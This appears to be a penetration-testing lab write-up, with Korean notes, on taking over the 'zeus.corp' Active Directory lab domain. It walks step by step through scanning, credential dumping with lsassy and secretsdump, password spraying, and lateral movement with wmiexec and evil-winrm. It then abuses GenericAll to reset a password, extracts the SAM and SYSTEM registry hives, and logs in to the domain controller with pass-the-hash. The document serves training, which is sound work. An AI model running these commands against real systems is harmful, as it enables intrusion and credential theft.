Information
About this lab
The Zeus Challenge Lab covers a number of hands-on exercises embedded in different client systems within the Zeus.corp domain. Learners will compromise a client system to find to access database configurations, and intercept authentication requests. After intercepting authentication requests, learners will login to a different system with the captured ticket, then a specific document to discover cleartext credentials. The final part of this lab asks the learners to log in to the system to reset a user’s password and create a backup.
Proof of Concept
Information Gathering
Nmap
# Nmap 7.95 scan initiated Sat Dec 27 00:32:12 2025 as: /usr/lib/nmap/nmap -Pn -n --open --min-rate 3000 -oN scan 192.168.220.158-160
Nmap scan report for 192.168.220.158
Host is up (0.14s latency).
Not shown: 987 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
Nmap scan report for 192.168.220.159
Host is up (0.13s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
Nmap scan report for 192.168.220.160
Host is up (0.14s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-dsHost Discovery
┌──(kali🎃kali)-[~/oscp]
└─$ nxc smb 192.168.220.158-160
SMB 192.168.220.159 445 CLIENT01 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT01) (domain:zeus.corp) (signing:False) (SMBv1:False)
SMB 192.168.220.158 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:zeus.corp) (signing:True) (SMBv1:False)
SMB 192.168.220.160 445 CLIENT02 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT02) (domain:zeus.corp) (signing:False) (SMBv1:False)
Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00192.168.220.159 - Client01
Eric.Wallows / EricLikesRunning800Initial Access
winrm
┌──(kali🎃kali)-[~/oscp/159]
└─$ evil-winrm -i 192.168.220.159 -u 'Eric.Wallows' -p 'EricLikesRunning800'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\eric.wallows\Documents>권한 확인
- Administrators 존재
*Evil-WinRM* PS C:\Users> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288Read proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type proof.txt
7d5fc9fee1214f781eefd5c8edaf6a5f
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.220.159
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.220.254Post-Exploitation
nxc lsassy module
- o.foller / EarlyMorningFootball777
┌──(kali🎃kali)-[~/oscp/159]
└─$ nxc smb 192.168.220.159 -u 'Eric.Wallows' -p 'EricLikesRunning800' -M lsassy
SMB 192.168.220.159 445 CLIENT01 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT01) (domain:zeus.corp) (signing:False) (SMBv1:False)
SMB 192.168.220.159 445 CLIENT01 [+] zeus.corp\Eric.Wallows:EricLikesRunning800 (Pwn3d!)
LSASSY 192.168.220.159 445 CLIENT01 zeus\o.foller decca5b9babc228de4cedeb29a6b9abf
LSASSY 192.168.220.159 445 CLIENT01 ZEUS.CORP\o.foller EarlyMorningFootball777impacket-secretsdump
- Administrator NTLM 해시 발견
- a1fcb4118dfcbf52a53d6299aab57055
┌──(kali🎃kali)-[~/oscp/159]
└─$ impacket-secretsdump Eric.Wallows:EricLikesRunning800@192.168.220.159
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf05dca6ed1673a51e5ae2479cb5da7c0
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a1fcb4118dfcbf52a53d6299aab57055:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:11ba4cb6993d434d8dbba9ba45fd9011:::C:\SQL 디렉토리에서 connection.sql 파일 발견
*Evil-WinRM* PS C:\SQL> dir
Directory: C:\SQL
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/26/2022 8:53 PM 528 connection.sqlDC01 db_user 아이디 비밀번호 발견
- db_user / Password123!
$SqlServer = 'DC01'
$Database = 'master'
$SqlAuthLogin = 'zeus.corp\db_user'
$SqlAuthPw = 'Password123!'
# query to show changes
$Query = '
SELECT @@SERVERNAME AS [ServerName]
, des.login_name
, DB_NAME() AS [DatabaseName]
, dec.net_packet_size
, @@LANGUAGE AS [Language]
, des.program_name
, des.host_name
FROM sys.dm_exec_connections dec
JOIN sys.dm_exec_sessions des ON dec.session_id = des.session_id
WHERE dec.session_id = @@SPID192.168.220.160 - Client02
Lateral Movement (Client01 to Client02)
Client02에 o.foller:EarlyMorningFootball777로 smb 인증 성공
┌──(kali🎃kali)-[~/oscp]
└─$ nxc smb 192.168.220.158-160 -u users.txt -p password.txt --continue-on-success -t 100
SMB 192.168.220.158 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:zeus.corp) (signing:True) (SMBv1:False)
SMB 192.168.220.160 445 CLIENT02 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT02) (domain:zeus.corp) (signing:False) (SMBv1:False)
SMB 192.168.220.159 445 CLIENT01 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT01) (domain:zeus.corp) (signing:False) (SMBv1:False)
SMB 192.168.220.158 445 DC01 [-] zeus.corp\administrator:EarlyMorningFootball777 STATUS_LOGON_FAILURE
SMB 192.168.220.158 445 DC01 [+] zeus.corp\o.foller:EarlyMorningFootball777
SMB 192.168.220.158 445 DC01 [-] zeus.corp\db_user:EarlyMorningFootball777 STATUS_LOGON_FAILURE
SMB 192.168.220.158 445 DC01 [-] zeus.corp\administrator:Password123! STATUS_LOGON_FAILURE
SMB 192.168.220.158 445 DC01 [+] zeus.corp\db_user:Password123!
SMB 192.168.220.160 445 CLIENT02 [-] zeus.corp\administrator:EarlyMorningFootball777 STATUS_LOGON_FAILURE
SMB 192.168.220.160 445 CLIENT02 [+] zeus.corp\o.foller:EarlyMorningFootball777 (Pwn3d!)
SMB 192.168.220.160 445 CLIENT02 [-] zeus.corp\db_user:EarlyMorningFootball777 STATUS_LOGON_FAILURE
SMB 192.168.220.160 445 CLIENT02 [-] zeus.corp\administrator:Password123! STATUS_LOGON_FAILURE
SMB 192.168.220.160 445 CLIENT02 [+] zeus.corp\db_user:Password123!
SMB 192.168.220.159 445 CLIENT01 [-] zeus.corp\administrator:EarlyMorningFootball777 STATUS_LOGON_FAILURE
SMB 192.168.220.159 445 CLIENT01 [+] zeus.corp\o.foller:EarlyMorningFootball777
SMB 192.168.220.159 445 CLIENT01 [-] zeus.corp\db_user:EarlyMorningFootball777 STATUS_LOGON_FAILURE
SMB 192.168.220.159 445 CLIENT01 [-] zeus.corp\administrator:Password123! STATUS_LOGON_FAILURE
SMB 192.168.220.159 445 CLIENT01 [+] zeus.corp\db_user:Password123!
Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00wmiexec로 접속
┌──(kali🎃kali)-[~/oscp/159]
└─$ impacket-wmiexec o.foller:EarlyMorningFootball777@192.168.220.160 -dc-ip 192.168.220.158
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>관리자 권한 보유
C:\>whoami /all
USER INFORMATION
----------------
User Name SID
============= ===============================================
zeus\o.foller S-1-5-21-2826791697-1341466529-4139912853-10601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288Read proof.txt
C:\Users\Administrator\Desktop>type proof.txt
3552de8f6a50a45ae51a267b328c09af
C:\Users\Administrator\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.220.160
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.220.254Post-Exploitation
z.thomas 디렉토리에서 Onboarding Document.docx 파일 발견
C:\users\z.thomas\Downloads>dir
Volume in drive C has no label.
Volume Serial Number is FCF3-9653
Directory of C:\users\z.thomas\Downloads
06/26/2022 09:23 PM <DIR> .
06/26/2022 09:23 PM <DIR> ..
06/26/2022 09:14 PM 6,454 Onboarding Document.docx
1 File(s) 6,454 bytes
2 Dir(s) 29,755,596,800 bytes freeOnboarding Document.docx 파일에서 z.thomas 계정 비밀번호 발견
- ^1+>pdRLwyct]j,CYmyi
SharpHound 정보 수집
- BloodHound에서 확인
- z.thomas 계정은 d.chambers 계정에 대해 GenericAll 권한을 보유하여 비밀번호 강제 변경이 가능하며, d.chambers 계정은 Backup Operators 그룹에 속해 있음
c:\Users\Public\Desktop>.\SharpHound.exe -c All -d zeus.corp --domaincontroller 192.168.220.158 --ldapusername o.foller --ldappassword EarlyMorningFootball777
2025-12-27T07:56:43.3149116+00:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-12-27T07:56:43.4399105+00:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2025-12-27T07:56:43.4555368+00:00|INFORMATION|Initializing SharpHound at 7:56 AM on 12/27/2025
2025-12-27T07:56:53.4867921+00:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2025-12-27T07:56:53.5492885+00:00|INFORMATION|Beginning LDAP search for zeus.corp
2025-12-27T07:56:53.5492885+00:00|INFORMATION|Collecting AdminSDHolder data for zeus.corp
2025-12-27T07:56:53.5961663+00:00|INFORMATION|AdminSDHolder ACL hash 403C5F17FA419DAB50B26B1ADA2134C3B9404111 calculated for zeus.corp.
2025-12-27T07:56:53.6899100+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
2025-12-27T07:56:53.6899100+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
2025-12-27T07:56:53.7055339+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
2025-12-27T07:56:53.7055339+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
2025-12-27T07:56:53.7367839+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
2025-12-27T07:56:53.8305360+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
2025-12-27T07:56:53.8305360+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
2025-12-27T07:56:53.8305360+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
2025-12-27T07:56:53.8305360+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
2025-12-27T07:56:53.8305360+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP
2025-12-27T07:56:53.8305360+00:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for ZEUS.CORP192.168.220.158 - DC01
Lateral Movement (Client02 to DC01)
z.thomas 계정으로 DC01에 winrm 인증 성공
┌──(kali🎃kali)-[~/oscp]
└─$ nxc winrm 192.168.220.158 -u 'z.thomas' -p '^1+>pdRLwyct]j,CYmyi'
WINRM 192.168.220.158 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:zeus.corp)
WINRM 192.168.220.158 5985 DC01 [+] zeus.corp\z.thomas:^1+>pdRLwyct]j,CYmyi (Pwn3d!)winrm 접속
┌──(kali🎃kali)-[~/oscp]
└─$ evil-winrm -i 192.168.220.158 -u 'z.thomas' -p '^1+>pdRLwyct]j,CYmyi'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\z.thomas\Documents>Read local.txt
*Evil-WinRM* PS C:\Users\z.thomas\Desktop> type local.txt
114c8c0887967cfa9df509bba69b5c87
*Evil-WinRM* PS C:\Users\z.thomas\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::8242:993a:ef37:ed3d%12
IPv4 Address. . . . . . . . . . . : 192.168.220.158
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.220.254Privilege Escalation
d.chambers 계정 비밀번호를 “1q2w3e4r”로 변경
*Evil-WinRM* PS C:\Users\z.thomas\Documents> net user d.chambers 1q2w3e4r /domain
The command completed successfully.d.chambers로 winrm 접속
┌──(kali🎃kali)-[~/oscp]
└─$ evil-winrm -i 192.168.220.158 -u 'd.chambers' -p '1q2w3e4r'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\d.chambers\Documents>SAM, SYSTEM 파일 다운로드
*Evil-WinRM* PS C:\Users\d.chambers\Documents> reg.exe save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\d.chambers\Documents> reg.exe save hklm\system system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\d.chambers\Documents> download sam
Info: Downloading C:\Users\d.chambers\Documents\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Users\d.chambers\Documents> download system
Info: Downloading C:\Users\d.chambers\Documents\system to system
Info: Download successful!SAM, SYSTEM 파일에서 NTLM 해시 덤프
- Administrator NTLM 해시 덤프 성공
- 650836aac5e819c6afb991606f63f5c3
┌──(kali🎃kali)-[~/oscp]
└─$ impacket-secretsdump -sam sam -system system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xf7d6d584287ffb4f29364a67bc20d85b
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:650836aac5e819c6afb991606f63f5c3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...획득한 administrator NTLM 해시로 winrm 접속
┌──(kali🎃kali)-[~/oscp]
└─$ evil-winrm -i 192.168.220.158 -u 'administrator' -H '650836aac5e819c6afb991606f63f5c3' -
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>Read proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type proof.txt
dc2abff018bd086fe158c71811f72ecf
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::8242:993a:ef37:ed3d%12
IPv4 Address. . . . . . . . . . . : 192.168.220.158
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.220.254